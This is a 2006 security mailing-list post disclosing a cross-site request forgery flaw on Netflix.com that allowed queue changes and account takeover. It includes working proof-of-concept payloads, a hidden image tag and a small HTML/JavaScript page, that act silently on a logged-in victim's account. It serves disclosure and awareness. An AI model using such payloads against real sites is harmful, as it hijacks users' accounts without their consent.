WebApp Sec mailing list archives
Netflix.com XSRF vuln
From: "Dave Ferguson" <gmdavef () gmail com>
Date: Mon, 16 Oct 2006 08:51:41 -0500
I just posted information to the Full Disclosure list about a Cross Site Request Forgery (XSRF) vulnerability on Netflix.com. Netflix has recently fixed several of the most serious issues. Some of you in the U.S. may be Netflix subscribers. Here are some of the things that could have been done to you if you visited the wrong web page. - add movies to your rental queue - add a movie to the top of your rental queue - change the name and address on your account - change the email address and password on your account (i.e., take over your account) - cancel your account (Unconfirmed/Conjectured) The exploits are extremely simple and are especially effective if the victim chooses to stay logged on to the Netflix site. For example, to add a DVD to a victim's queue, an attacker would add an image tag to his web page and just wait for Netflix subscribers to visit the page. <img src="http://www.netflix.com/AddToQueue?movieid=70011204" width="1" height="1" border="0"> Adding a DVD to the top of the queue takes a little JavaScript, but is even nastier because it would probably be shipped before the victim knew what had happened. <html> <head> <script language="JavaScript" type="text/javascript"> function load_image2() { var img2 = new Image(); img2.src="http://www.netflix.com/MoveToTop?movieid=70023965&fromq=true"; } </script> </head> <body> <img src="http://www.netflix.com/AddToQueue?movieid=70023965" width="1" height="1" border="0"> <script> setTimeout( 'load_image2()', 2000 ); </script> </body> </html> I think XSRF could be a sleeping giant, kind of like XSS was a year or two ago. Jesse Burns has a great whitepaper about XSRF here: http://www.isecpartners.com/documents/XSRF_Paper.pdf Regards, Dave Ferguson ------------------------------------------------------------------------- Sponsored by: WatchfireWatchfire was recently named the worldwide market leader in Web application security assessment tools by both Gartner and IDC. Download a free trial of AppScan today and see why more customers choose AppScan then any other solution.
https://www.watchfire.com/securearea/appscancamp.aspx?id=701500000008YTO --------------------------------------------------------------------------
Current thread:
- Netflix.com XSRF vuln Dave Ferguson (Oct 16)